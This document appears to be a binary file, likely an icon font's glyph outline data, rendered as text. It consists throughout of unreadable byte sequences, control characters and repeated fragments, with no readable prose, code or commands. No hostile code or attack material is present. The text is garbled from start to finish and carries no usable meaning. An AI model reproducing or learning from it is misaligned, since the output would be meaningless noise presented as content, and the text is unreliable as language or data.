���'=IUamy���2>54.#"2#".54>326764/54&#"%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"j��QQ��jj��QQ��jc��LL��cc��LL����		�{







��







�







 



��



@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�g
��

�






s


��


s


��


�


��


����2>54.#"3267>'.'.'.'&67>7>323267>7>7>7>7263.'.'.30216>'.'.'.'.#"&'>7>7>7>76&'&"#.'3:3>5.&'.'.'.'>7j��QQ��jj��QQ���


2o<9l0;p2%C(&@"6v@/N9#&[4&R+'N&		$J%)N$7_( 8L/



2o<9l0;p2%C(
&@"6v@/N9#&[4&R+"C!	$J%)N$7_( 8L/@Q��jj��QQ��jj��Q�9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L					R5;naR9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L				R5;naR���'c�2>54.#"2#".54>67>'.'.'.7>763267>54&'.!67>'.'.'.7>763267>54&'.j��QQ��jj��QQ��jc��LL��cc��LL��F


	#=:#4"7



	#=:#4"7
@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�k
			9.D�=KP$5G


			9.D�=KP$5G

���Th4&#"!"3!3265!2654&#!!#.'54&#""#";3326=>532654&#".54>32 		��		0		/		���T@f�L		R�pEP		NAq�V		P�g<R		�O�i<<i�OO�i<<i��		��		��		/		L�f@R		P<g�P		V�qAP		REp�R		�`<i�OO�i<<i�OO�i<����'A[q��"32>54.".54>32"326=4>;2654&#!#";2326=4.54&#"326764'76&'&3267%.3267>'�]�yGGy�]]�yGGy�]V�qAAq�VV�qAAq���2WA&		!8L+		�		+L8!		&AW��		���`
`
`�Gy�]]�yGGy�]]�yG��Aq�VV�qAAq�VV�qA�&AW2"		"+L8!				!8L+"		"2WA&���

��
���
�
�
�
�����;{32654&+"326=&'&32>7>54.'"'.54>7>676&'.#";26781>=4&#T�		�			"4$$4"3{��B.]/2b]T%$8&&8$�f	"4$$4"2y��BF���4%8&&8%�		�	@			�		�"NV]00]VN"3B&8%$T\c33c\T$��	�"NW\00]VO"1B	
F5$T\b43c\S%		�	�����(4@LXq"32>54.#".54>322654&#"72#"&5462654&#"72#"&546#"&'.326764'&"j��QQ��jj��QQ��jc��LL��cc��LL����&&&&


m&&&&


7(o;=p(.}DB|-�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�&&&&`



`&&&&`



��,12-3761�����(DP\ht"32>54.#".54>32"67>32326764'.#'2654&#"72#"&5462654&#"72#"&546j��QQ��jj��QQ��jc��LL��cc��LL��^C{.)n<=o).}D�&&&&


m&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��Ke71,01-38j&&&&`



`&&&&`



�����(X"32>54.#".54>32#&#&73736'536'56&#5>3627>'56&'";#"#54&+53267>=46;j��QQ��jj��QQ��jc��LL��cc��LL��
UR)0

0
b	P

P9
(&NN
A	00!:D�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�U75
`
�

�
`
0`
^"=>
��
>E64=�����(|�"32>54.#".54>32>76&'..#".'.#"""1'&32>5<5>764'.#"&'>7>'.#"&'267>54&'.'>76&'.5467267>'.546327>77263j��QQ��jj��QQ��jc��LL��cc��LL���
+2H5`"		%8
&W-JuR+

7'HiB.1	$#

*m;4$!
�Q��jj��QQ��jj��Q� K��cc��KK��cc��K~
H24+
	0	'

	7Yr:94eP1

	!'+1
$4
�����'fs�"32>54.".54>324&+*#*#"3267.#"32654&'.'.'&65>5>54&'3265"&54632#"&54632%#54&#"#&73326=3654&j��QQ��jj��QQ��jc��KK��cc��KK��"
�5LL5	
B]]BB^
3
�4II44JJ4'88''88cK
	N

N
K

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�
@..@	E11EE1,/'
�11##11##1&----[L
	P

L

L

�����'@Wdp"32>54.".54>32"3232654&'.#5"3232654.#"32654&#"&54632j��QQ��jj��QQ��jc��KK��cc��KK����

6Y !

&$%e=

V�l=

Bu�]0&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��K!

   Y6

=e%%&�

<k�U

\�tA��&&&&`

�����'w�"32>54.".54>32#56&+"7&3267>7>'56&'&"#"&'.'.5&4=36'56&#&3267#"&'.'./.'56&+5>7>7>7373j��QQ��jj��QQ��jc��KK��cc��KK��-p
S
	
0
o

o




/	3
o�Q��jj��QQ��jj��Q� K��cc��KK��cc��K_p
	W
 �,
		MN
`
a
^%

�
:

o
@�����(GS_os��".#&;26=067>32;26'56&##54&#"#36?>32"32654&"&54632#";2654&#3"32>54.".54>32p
	`		`

	
d
`3qB"	
A>		]�&&&&


!_

_

@@�j��QQ��jj��QQ��jc��KK��cc��KK��B
��		�
�		�SD���!
	�?
	
#Q�&&&&`



?��		`
��?�Q��jj��QQ��jj��Q� K��cc��KK��cc��K	�����'I��q��"32>54.".54>32.#"3267>781>54&'.'.'"&'"&#*#*"#".'.'.'>7>7>7>7>7>7>7>7>7>7>7263>7'2""#4&5.'"4'.'.'.'.'.'"4#>010"#'"&#"&'>7<5233232381263263>7>3>7>3.5461>7>7>7>7>7>7>7>7467>7>7>7>7>3&7.'<#.'267263623:3223j��QQ��jj��QQ��jc��KK��cc��KK��X%`61BU2-"T,64J$" 	
		
	
�+O	


	 P		
8	@1~
	

			

"$a



	4n�	
		



2"�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�'*
	rG:i%W7"1[$�F%
�

		
		5U�
	 T.�!%=k=�c`�"32654&"&54632%'764/&"'.+"'&"2?;26?2?64/7>=4&''.#'4&'&'7>'./572676&/77>5736?3�B^^BB^^B6MM66MMP]:�J�J�9\\9�J�J�:]jBwT
�
TwAiiAwT�
TwAjp^BB^^BB^��M66MM66M�J�9\\9�J�J�:]]:�J��
TwAiiAwT
�TwAiiAwT�	�Im!^n�������64'&.#"6&'&"32673267>'32673267>76&'.'>54&'3267%624&'&47'.'&67>32%&'&67>32#".54>32'.'>762%"32>54.#".54>32'54&#"326764/`(()s) D%$E(t())
$3

D#$C	 2$�v!\!5S!!�

x


l3WtCBuW22WuBCtW3S5!]!  ��6_G**G_66`G))G`60V@%%@V01U@%%@U#NJP(s))((()s( D$+OG<	





	<GO+$E�!!T5 ]!�q
	
	

8CuW22WuCBuW22Wu[5T!!!] f)G`66_G**G_66`G)�%@V01U@%%@U10V@%��OJ�8o|���.#!'.'.'./.'#.'#"&+";1!'>?>'##81'!"&/#'0&/#"&546;2322!21"32654&#"&54632%"32654&"&54632��t�$%X$X�j5e
�{
f
.o�*�
�#$33$$33$!!  $33$$33$  !!�
E%%M�#�Sj�		�dZ
5��3$$33$$3�!!!!�3$$33$$3�!!!!��42'+0=FZht}2654&#"352"5463%!"3!2654&#!5!!2654&#"352"546&"326?'#";2654&2654&#"72"546�


4����i��3

�
JGX[�PP/



�

%U��������8


'�
HG
XY�


'lA��,CGKVafj|���%!"&5463!2#!"3!2654&#"&54632#5!32+!#"&546;%#33#7627764'&"3#53#"&/&4762#"&/&4762#"&/&4762#"&'&4?62#��3**f

���

**���

�$

G�{��kHH/B<���NJ<

���llll�LLfLL�LL�$$A**

��

*��*H
�.�
��$�R���C;��/�J<


��A$$�$�LLeLL�LMG$$��{16;@��������"0010;26?0&5061463>7>54.##'37#'37#'37#54632654&#""&#.#81"381812#.'.'.54>3226=4&#"3326764/&"4&+";26326?64'&"&"326764/7#";2654&#'26?64'&"3/1U@%/+'q'+0%@V0-Z`	ms
�
�
;C				
C'+ 8K+*K8 +'v				�FF>	c		c	>GF�FF�c		c		�FG�%@V07`"��"`70V@%�{,,;;�"�							
�"U1*K8  8K*1U�	c		c	SFF�				�FFFG�				�FF	U,��'+0<FR\2654&#"352"5463%!"3!2654&#!5!!2654&#"72"54632654&#"72"5463���		>		�������1n	��		>	����O���333 } ;t��"32654&'>54.#2.'.54>3#"&54670317067467>7>7>7>7>74&#"3265!4632#"&53ZC'1<DR�ba�RD<1&CZ3,N;"%6==6%";N-�nVWnH@
@H*[?@[[@?[��H32II23H}'CZ3$bmr46"-==-#54rna$3ZC' ":N-%jtp+!!+ptj%-N:"�-00)		
		)�@ZZ@@ZZ@3HH33HH3 E�&
)Zf��%26=4&#"#26=4&#"#26=4&#"#'.#"#76&'.#"#"3!267>=4&##!"&5!#!"&=46;7>!'&6763226=4&#"�qpʙN,�-O�+#7++7&,Q��6�6w���YPfOY�����������~
,FG,+*/��*+</*+�:���*�||�*�����k|�%Khv����!546;267>'.=4632;2%!54&+"&'.7>=4&#"+"!"&'.=+"&5463!2#%!5!37>"&=4632#"&=4632#"&=4632#"&54632|�`'�;)*;�'��]�
((�L�\#T

;

�m���9>
P



J



J

	
9x�(	+*;;*+(�"d
%''$
d��?G

		��
"��}
u"
�

�

�

�

T

T
���wUjt~26?>54&/.+54&#"#";#";32654&'532676&/7>'.+53#"&5467326=!'7!%764/!!�__�		�TT�__�@XaFGaX@�TT�L=<MD6	7COEE��PPo�QDDoOO��|_^			TT	 _
_�3$'55'$3�	TT	 ��''%<<%E
EPO\EDOP:Y\�)BO.'>54&'.#"3267326764/'#"&'.5467>32%34>35"_(,/,-r?>r-,//,-r><m,��$(h98h((++((h89h((++(�K!8L*0VA%o+m<?r,-//-,r??r,,0,)��)++)(g99h((++((h99g(�+K9 %@V1
��#�&7;JZjv�%"32654&"&5463232654&+"3!"3!2654&#!!'32654&+"3%!"3!2654&#!"&5463!22654&#"72#"&546

1//�e

���w�~~	"�:%%�&&�:��}uN



&P
��

Q
��-G		�%��&&R%�nRX&P�_
)Ll!"3!2654&'!"3!2654&'!"3!2654&7!":1!3:7>=3021>54&##*1#"'.#!0"#"&5463!2�b		�		�b		�		�b		�		��*'&��X&'$f	��c��				h				g	

	�(��'��'(��	����S���@DQim4&'<'4"1.'"&#0"1!"01"#8813!267201647465
0"1/0"1%!22320120126162?!%7%%���=��&���GC���֘GG!�!�&����� ����75�� 77���9�&h�E
!HSXj!"3!2654&!"3!2654&!!#4&#!"#"833!26?>7>54&#463!2!!'!7!"&'.5463!2#���Rt��

;

���6�Q:CI
����:�!F(D��xH�	��

h	��H�K��
SI
�

���v((IZ�! ;S..1270>7>4&"'.467>7>2#1"1#"&514638�+mro--orm+----
qePm�o---Z��

��$##$"UZX$++$XZU####��		+=		P8+,((((,+-ptp-q}dl�n-ptp����		^#Y\X#"#!''!#"#X\Y		=+		8P@ &O.#".#"31!2>54.1!"&5467>'.5463067>32#=0Mc8+PC6
<T.:!8L+@2WA&4GW��<T&"!	
/!
nA+M<%$>QgI7_G(,=%T<^:+L8!&AW2,N?*�mT<&B"!/;G6J,"b?Ig����.K.'%'.#"326?3267>'7>''.#"6&/%>?� ��t	$$	t�� 
�-
		��		
-�
��-�				�-�
tt
�.'��''��&}}&�'�!��}}!�(��(�
% �@"6i}������.#"3267>7>4&'.'"&'.467>2.'.#"32654&'>7>7>4&'"&'.467>22654&#"72#"&5462+"&546372+"&546372+"&5463%6#"&57>?�A�AA�A		A�AA�A	

	@�@@�@5iii54iji42e3�]]�3e3>g���hh���g_		

&		`

�		`

`		`

��		x
	
��

5jji5

5jij5�N



2eed3



3ded�		M���M	

	M���M��

J���J

J���]@				��				`				`				�		
=		Y
���=T_s�4.#1"&5463021281#"&51.#"326?!2676&'#"&/.546?4210#7">5!%+5467>32"&5463021281#"&514.#1`-Oi;		BtW2		��#		 d�$$d�1�@�c

�d
.�����

�*	���

\�zF

=h�O;iO-		3VuB		�1�HdP�d 9���d�
c����W	�

�@	�

Gy�]

O�h=` !19#"54&#!"3!26=;2654&"&5463!2#%#'5'573�
	W8(��(88(`(8W	
&&��

`

 � � 
V((88(�(88('U	
&%��


�
� ��
@����%/9DTYin~�.+54&#!"#"#313!26526=#%463!2!#!"&5!7!5463!232654&+"3#32654&+"3#32654&+"3#�7&`8(��(8`&7&K55K&��
@
��&�&�@�
�
��@

@

@@�@

@

@@�@

@

@@�%5 (88( 4&F%��5KK5 %Fz

 �%% ` @

�`
�

�`
��`��@
�

�`
��`��@
�

�`
��`�����-FY%.'>7>.'.#"3!2676&'%"/.7>32>?3267�,NkA0=
	*$*tEEt*$*	
=0AkN,"�"��9�9
"1	$>X::X>$	1��(Hd=O..O<dG*5$(<�6&isr.6785.rsi&6�<($((�
BB
+ahl53eO11Oe35mga�!%

$"���-Zx�";26?326=326=732>54.#"&'#"#"#5817.54>32#.'.7>7>54&.'>7�BuW2�{
&`
.K%@%L:BuW22WuB#Ba	
@&K
	-[u/(F]55]F((F]5�A&!.A&!.c#>	##>	#�2WuB:�{
`&
.&@&KL2WuBBuW2��a	
K%@
	-[u/B#5]F((F]55]F(8&A-!
%A.!	T=##	>##	���!1EY"13267132>54.#"&54675%".54>322#"#"&54>�P�i<��B/)([1P�i<<i���"
(���BuW22WuBBuW22WuB		Pp		#=R�=h�O1Z)��*/B<h�PO�h=�J
!(���2WuBBuW22WuBBuW2 
	qO		.R=#���l��
'.'76&/.#"./.+"'.#"326?;26?>7326?>/>?>=4&''.#"#'.'.'.#"'7>'.'./57>7>76&/73267>7>?3326?"32>54.".54>32"32654&"&54632�c	8
>		T
$W$
S			>8	cc	8>			S
$X$
T		>
8	co	8>S
	X	
S>8	bb	8>S
	W	
S>8	bb��.R=##=R..R=##=R.)G55G))G55G)5KK55KK5(88((88*
S.>	
8	bb	8
	>.S

$W$
T->	
8	cc	8
	>-T
$W$�	"S>8bb8>S"	W	!S>8bb8>S!	W#=R..R=##=R..R=#�\5G))G55G))G5DK55KK55K�8((88((8`3Mg"32>54.'.7>'2#"1#"&5146%/.#!"3!2654&#!"&546?>3!25]F((F]55]F((F]]4�<<34�<<
�		(8		K�,0��0,�#-8(@(8-
��
�9
@
9��(F]55]F((F]55]F(��<
44�<<34��		8(		5K�n!!n6#� (88(�#6��

��		�@�@'3?.#!"3!26764#!"&5463!2'"32654&"&54632�:!��5KK5`!:�J�	��&&`	�
�(88((88(%%&& K5�5K JG�%&�%s8((88((8�%&&%�����4=Xk54.#"";2>=4&%4>32#54&#"#%!54632+".=463:3!:322#"&'.5463 -Ni<<iN-(8-Ni<�<iN-8��#=R..R=#@^BB^@`�K55K�#=R.�.R=#
 � 
��&

& �<iN--Ni<�8(�<iN--Ni<�(8�.R=##=R.��B^^B����5KK���.R=##=R.�

`%11%���`�'/6M_"3267>54..'0417'.'3"&'7!.'.54>322#"#"&546I�`7&560*ef)074&7`�
�	��
�q
�z��6-Oh<<hO-6�		B^		q�7`�I0cb`-����-`bc0I�`7��@	�
( 48p1<hO--Oh<0q83�		^B		Oq����&6EM_t�.#"01"93261%>7>.'.'81<''.'.''.#7>#"&5465767.'.'7>7646'.'.#7>32�(c4+M���KB.	�")&�S
/�'	
!1"
�Ή.�M)�"9w�>! 0�46*vz6*#'c456'L!m(+�����.BG�!V\Z&�Z*.,V�q
1
��v	
�
�(z9( @s#37�/6.W#'+6!E$";@@#(,/258;>BEIMQ'.#!"3267>54&#7?#'73;7'3'3'3#33!37'7%#�	
��
	�
	�		�
�Q�GWAQ�QAWG�PP� ��WOArp=�G���=p1O��N���qfq���WJ��JW���	

	�		�#�	!;IACCAI;5�q��w�AA�3	<33_A �w���P��P V=��=V���5E!"3!2654&!!7!"3!3!2654&/5!2654&#!"&5463!2`�@

�

�@�@��(88(@�

@

�@(88
��

@
 
�@

�
� ��8(��(8'

'8(�(8� 

�

�����4O2654&#"2#"&5467"3021265>54.#0&'.54>32OqqOOqqOB^^BB^^BO�i<@cu45tc@<i�K,m`B2WuBBuW2B`n,�qOPppPOq`^BB^^BB^�<h�PT���<<���TP�h<�D2���NBuW22WuBN���3�CXn��<'40'045.#""1"00132>7<16056454654&".'>32#2#1"#"&54638'"32>54."&54632�#l��PP��k##k��PP��l#�D�ta !`t�DC�t`!!`t�C

(8
	K5.R=##=R..R=##=R.OqqOOqq�CpQ--QpCBpQ..QoC��%C_9:^C%%C^::^C%�		8(

5K`#=R..R=##=R..R=#�`qOOqqOOq�Dm2#"#"&54>7"081326>732>54.#"&'*#">7<54&'.54>32		@tX4		8aHj��P ;S20&F;)2j��PP��j-	
6#	
,F1Gy�]]�yGGy��		5F&		.Q=$�<i�P2\QE+T$*(
<i�PP�i<�@
00:CK&BuW22WuBBuW2�#DS.#!"3!26=4&#!"&=!!";;26?3267>'.##"#'.+!��#��#�K55K?&�&����n�.	�	.�n5/�/�]�]q��	�5KK5�	�&&�� �
��]]�
��]]`��@����'+/48<'.#!";3!2674&5326=4&%!!'!7!!!'!7!5!�'!��!'#&!@%�%@!&#�C@ ��`��$$$$'��@`�uu%`&��!!@&`$b`��``�@��``@`���`�'7G!"3!2654&#!"&=!5!!5!5463!2+"&5146;2+"&5146;2�(88((88
�
@��@��

�	`		`	 	 		 	�8(��(88(@(8�`

@ � @

				��

		���0>LZhv��������!"#"3!2654&#!"&546;3265463!2"&5463!2#%"&5463!2#%"&5463!2#2#!"&5463%2#!"&5463%2#!"&54632#!"&5463%2#!"&5463%2#!"&5463%2#!"&5463!2#!"&54637326=4&+"73#��@(8 (8K55K8&�&
 


�
��				�				�				��		�				�				�		`		�				�				�				��		`		��		�

�
-���8(@8(��5KK5 (8��&&�
��



��	

	`	

	`	

	��
		
`
		
`
		
�
		
`
		
`
		
�
		
`
		
�
�

�
�� $'7!"3!2654&#!"&57326?'7#"&'463!2��5KK55KK�����&�&��

����f

�f&&�f K5�`5KK5�5K���P��&&�i	

	i�����3&&�����Sc���.'>54.#".+";267:13021;267267>'>76&'>76&'>?<54&'+"&546;2#*1"30232#*1"30232#*1"302321+"&#.'0&5467>7>546322"32654&"&54632��g-8'8.Q
!`(88(`-;9pC�(9			

,/�;
`

`
�*$		$$)($		,)3#		
�Bnd*7I,E
�U��				q/$+N<#8'1�*8(�(8
0++ '%B��



1#		-3		/&		$	



�FQX)Y?94;"��@				 ����/CIO[g!"3!2654&#!"&5463!2#!"3!2654&'.#".#"!7!'7#2654&#"72#"&546`�@5KK5�5KK&�@&&�&`��

�

hS�h����X�nV�hX(88((88(&&&&�K5�5KK55K��&&&&
��

@
 �Dq^x�͓��f
��a�T@8((88((8�&&&&���&.<JXft����'.#!"3!2654&#!"&5463!1;'#"&515%"&546;2#"&546;2#463!2#!"&2#!"&54632#!"&54632#!"&54632#!"&54637326=4&+"73#�	
�`(88(@(8
6
��

�8(�` %��0		�		�		�		�	�		��	�		� 		�		� 		�		� 		�		� 		�

�
-���	
8(�(88(`
�|


�(8 &�� 				`				P				�				`				`				 				@
�

�
�������#/;GS~����4632#"&4632#"&'4632#"&%4632#"&4632#"&4632#"&4632#"&7"#./.#!"3!26?>7232654&#!.#"!'3267'".54>32#"&'.546?62�







�



�



��









�	&.$�#,)/-'-$$.(	&&�C #Q,,P$� #Q,,Q#�5]F((F]55]F((F]iN;��


��


�






{



��
�*J��+o@>m+�� L+&%���,�(F]55]F((F]55]F(�aG����'.4;.#"38126?3267>76&'	./81	%.'�	�@�v	C6��s����^�����
�����		d�	n|�	�l�Mi���m�����)7����/KYg�54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>328181%54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281814&#"326=>54&4632.#"#"&=326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281818((8##8((8##�

@

<


	


	�8((8##8((8##�

@

<


		

	��8((8##8((8##�

@

<


	


	�a(88(aB''B�(88(�B''Bw

C�

��





�a(88(aB''B�(88(�B''Bw

C�

��





��(88(�B''Ba(88(aB''B�

�=��

C�





����1F��3V	.7>7>7>7>7>7>76&.'>7.'.".'>3267>74&'.'&".'.#"7>7"'.'.'.#"267>73267>5.'.'>7>76&'.'&'.'.7467>7#.'>7>7:620"1"'.717>7>71>?4676211&'&47467>7� 	&%^36m.'6
@ 	&%^36m.'6��(PPP("���"(PPP("���"�	



	!
			�
	�




u



m@		#>%<E.(X2#��		#>%<E.(X2#��(PPP(n}j}n(PPP(n}j}n�	
			


	 					
A�



�


@����+Ig{���"32>54.#".=32>75101#".5049532>75101#".5049532>7".54>324632#"&54632#"&54632#"&Q��OO��QQ��OO��/<i�PP�i<Qfu;;ufQ<i�PP�i<Qfu;;ufQ<i�PP�i<Wen77neW��P�i<<i�PP�i<<i��











�3N6��6N33N6`6N3��4''4x'

'H4''4x'

'H4''4n##'44''44'� 


�


�


	���GS_c.#*.#"3267>7>53:7%.#"3267>7>534&'&'&676%&'&6765%�	��>#(.F`>(.F>#(.F
_>).F�
9h;:9h;%:g;:9h;1�� �`$��:&>1:;&"^�|:&>1:;&"�	�Y +*W!**WM +*W!**W�```���DR`t��"'#!"32;26=4&=405>7063>78181>7332>54.#46732+.%46;#"&#4&'313#1"&546;267.#"&'32654&+>32 1N(tB��6JJ6&%�& =i&M17T88T7�[&&[��&��&@�	`'&&-U%%U-y0NQ6JJ6QN0!:,,:�?4O_]CC]&��%% 
�\J4>M�SS�M�@08((80(8228�( !�
�8((8"'Q))Q'"��}c]CC]c}<i�PP�i<�!1M[g4&'%.#"32>57>#"&53267%%"#*'%.5467%623:4632#"&52#"&546* �_�` ** V&U�``�U&V *���
���`��



 &&%%�"4``4""4�� :,,: 4��EE>>```�

��

@f&&f���/Gbnz������.#"3021267>7326?>54&'"#"&'.7>?"/7.'.'%'&4?622654&#"72#"&546"32654&"&5463232654&#"72#"&5464632#"&4632#"&�.�M�!
%	�
-���h
�2eed2�K.
9.H�B)7-
���!//!!//!�!//!!//!�<&&&&@


M







I.	�
%-�m
�
-���P	.6���-9s
H'm6
-�
�/!!//!!/� /!!//!!/��`&&&&



�


�



���-2HVdu���#.'7>'..#"#"3!26=7>54&+7%2.#"#>.#"#>32'"#>32#.'"#>32.##!"&='463!2405&67>'8140181&45463201#"&'81"0%04#&67>'8181041&45463281#"&'1041'&05&67>'81401814&5463201#"&'818�V�	�ASa5As\?V!/p/!`!/p/���0YK<5DP,3]J4!9Sh�O11O#b?;_�%
';##;'
%Lv!/AP-N}nE@	��	�	`	�?


		
�
	

	
�

	
		 LJ.K6,Mj=/!	}!//!}	!/�2E)%>-"<R07]E'�*66*8HA3##�[E)G3UB;K��0		0�		y:-	;.	:.
;.	�:-	;.	��+2C'.#!"32673!2653267>?6&%#"&''!'7332673�	��	�@&@&@��
A**A
�`��`@��
U88U
����
&��w&&��&[$$��@�@��)77)����T�$J�14.10.132>76.'#".5467>'10>7067'#"&#.7>''.''.'#"&546?>?>?�A(/'/VS>$%.SvIk�P''E0V_�<_B#%3 '&

e0"
H
G@	
 		"1	@=�@^<hM-wGS�Y/����`8iQ1%=Q-=���<�=r(@R)An8G�`4p]=*<@<O^0`O-[ZV(�"7z.#\,86$).J %bW		qo.1,"Q3#L7.A : A!�,D"'&47>4&'."2764'&""'&4762"&'.467>2�****��

		[!  !!SVR!�2///�/�P��		

_/�///�-!RVS! !! �+jnj+,+jnj+��		

Z!RVS!!  !�7/�///�P��

		_///�/�2 !! !SVS �****
���(,048<JN\j'.'54&#!"313!26526=4&!5#73;#73#73#%546?>;#"&#3#4&+"#!7+'32�`&��%`	
8(&�&(8
������F!I��I@�jF����`
[�;
@���
�
��`
;�[
`Z��&&��
 (8�`&&�8( 3���`������  
���
@��@

���`
��
���+VZ^bfjnrvz#54&#"#54&#"#54&#"#"3!2654&##!"&546;326=3326=3326=323#3#3#73#3#3#3#3#3#��

�

�

�#22#V#22#
��

�

�

�

�
� ����������������`@

@@

@@

@2#�
#22#�#2��

�
@

@@

@@

@
�`@`@`````�```����(AEIPi�4632#"&%81=4&#!"3!26=81>4&!2.#154&#!".5463!5!!5!"&'5#!"&53!2!"3!7!"&5463!267>7461%%%%�8(�pIggI@Ig000���

�`
B.p�`��`���
�B.��.B9 �
��B^^B )��(88( 	@%%%%��`(8gI��IggI0$flfd
��

~(.B` @  @ ��.BB.�
@^BB^@8((87%B%����(5BNZr�����&>76..7>'&676&'.7>'7&676&.7>71"01&'&67>71>0#&'&67>7>'0"1&'&67#>7>1'.73>7816''.7>706161'.7>76016�b˵�'(M�cb˵�'(M��9V~C"#~��VV}D""��V�0

1
	$

SI�?JJ�?�2)b11*a�G-(?nkD>c
6Z83Q��(?H-
2>dlC3QY8
�(M�cb˵�'(M�cb˵���"��VV~C"#~��VV}D"�
1
	0
Y

�?JJ�?IJ���a12)b11*,1H?+Ik
bD=Y
P8E
?+1GucCIkOQ7
=Y
 `DT`l�.+";26=4&'#537'.+54&#!"31;326733267326=4&"&5463!2#"&54632!"&546327+.#"#.#"#"&=!26=32 

�
� `��*�8(� (88(8(%
D--D
�D--D
%(8�h

�

�&&%%�%%&&�
%
D--D
�
D--D
%
�(8��R
�

0	B��%�@(88(��(8`(8)77))77)8(�I
`

��
��&&&&&&&&�
)77))77)
`8(��	����(2;ENV_it~�����"32>54.#.'>7.'>70"#502.'.'>7:.'>7#>.'3.'>75*17>7'.'53'5>7##>3.'.'>73�g��NN��gg��NN��H� <19�B(BC"$-I#H&6Bu.7=|&H#I-�7.uB%=%O)��&I"�7;k+36 W"CB(�3+k; 6"I&��)O%���< �9<�8-!�8�!-�N��gg��NN��gg��N� 5e/
$7���!U2
�^&c;
�<-!4[*�
;c&�!-<%[\
�2`��1n:�f
2&
+M �
2U!�
&2
 M+)�:n1��
,`2$
/e5N��=s4BIQ*��4s=*QIB���� $(,04!2#!"&546"3!2654&#!3#735!5%35!5��%&�`%&

�

�` ``  ������%��%%�% 
��

�
@`@  �  �  ��  ����#!2#!"&54635!3535!5!5��%&�`%&:��`@ ����%��%%�%`  ``   �  @  ��`-148<ENRVZ!#37#7?4&#!"!732#!"&57546;3'375!'9>5!7%9!5!5!5���HH6lG$h
� 
fR��mm�%`&�`%`%��>>|�0�p00�������4�����`��`�@?? ]

��Z�``%lT�@%%�Tl%66�U++U*+���������`W  `  `  ��`+.26:'463!2!37!'''7/53!265''!5!5!5ii
�
k��&9�9�7F�����Fz`%�&`zImmc��`��`�`Z

��Z 11<����<g�T�@%%�T�g�``�  `  `  ����!$	#!"&54677"3!2654&#	!�ff
�`
&%�&%��������7��

�)%��%%�%������7%"3!2654&#����&%�&%b����`%��%%�%��`		3!265#!"&5	��``����
�
 &�`%��6���0��D�\

��\%%�`����`	'%%#!"&5	�..����&�`%�������C�@%%�`����`(,/37@I#37#74&#!"732#!"&57546;3'375!'9>5!7%96l�
� 
�Hwmm�%`&�`%`%��>>|�0�p00�������4���

���``%lT�@%%�Tl%66�U++U*+���������`��`)'''7/53!265'7"374&#!�F�����Fz`%�&`z��mm��
Ȏ�
� <<����<g�T�@%%�T�g�`` 
����
����	),.5467!'7!77"3!2654&#	!����������VV�Z&%�&%����������������KK%��%%�%������
'''7'7%"3!2654&#>�TT�����@&%�&%�HH������%��%%�%��`
%	3!2653!	#'%9!9.5�p%�&���@`�����4�`���@%%������)��`�����`
	3!2651'''7'7%�p%�&b�TT����`���@%%��^�HH������@���	 +.1594&'17''!7!"&5463!2!17'	!!'3535@��G0��VV��-@�%&�%��`�*��f@����0�   ��xxQCKK�Ll%�%%���7��������``�  @��� $('7'%77!"&5463!2'7!73535�q�������TTzK�-%&�%P__�`�   a������HHi%�%%����a���``�  @���4?BPW54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31/77@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<K4d{��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T8L4d|@���(5<'7'%77!"&5463!2.#"92654&#"3/77�D�������TTN		�%&�%5[�IggIIggIK4d{�;������HHC+)%�%%�2)��gIIggIIgXL4d|@���)@KN\'7'7754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"310DDDDDDD4�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<DDDDDDD
��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A'7'77/7'%77!"&5463!2.#"92654&#"30DDDDDDD�D�������TTN		�%&�%5[�IggIIggIDDDDDDD�;������HHC+)%�%%�2)��gIIggIIg@���	#1HSV32654&'.#"54&'1>3:9''!.54679!"&5463!2#"&'17'	!��-<T%-<T��^N/�gVV����%&�%7IgI3T����f@����T<.*T<.	��Q$-mYKK�!�%�%%�^<Ig5+������@���	<#"&'.#"/7'%77!"&5463!2.#"9�gI :�: Ig%D�������TTN		�%&�%5[�: IggI :�;������HHC+)%�%%�2)@���)@KN\533##5#5754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31  `` `��^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<@`` `` ���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A#53533##/7'%77!"&5463!2.#"92654&#"3 `` `` �D�������TTN		�%&�%5[�IggIIggI  `` `�;������HHC+)%�%%�2)��gIIggIIg@���4?BPT54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31'35@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<p���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T�  @���(59'7'%77!"&5463!2.#"91"&54632'35�D�������TTN		�%&�%5[�IggIIgg���;������HHC+)%�%%�2)��gIIggIIg�   @!506610'&#&106610'9�yy��yOs �cn�e_v�kp�6666��44#�0+!��.+ / @3>610'&1 sOy��yy�p���#44`5566 `5!!#!'7���   ��������  �� `3!'7! ర���pర  �`5
#% ��`  P����2��  �`3-  ��@���� �`
5!!#!��   ������  �� � �`3!!� ���p�`@@�@
32'46"74&+��(8��8(%��%�@8(�`���(8 &����S%@@�@
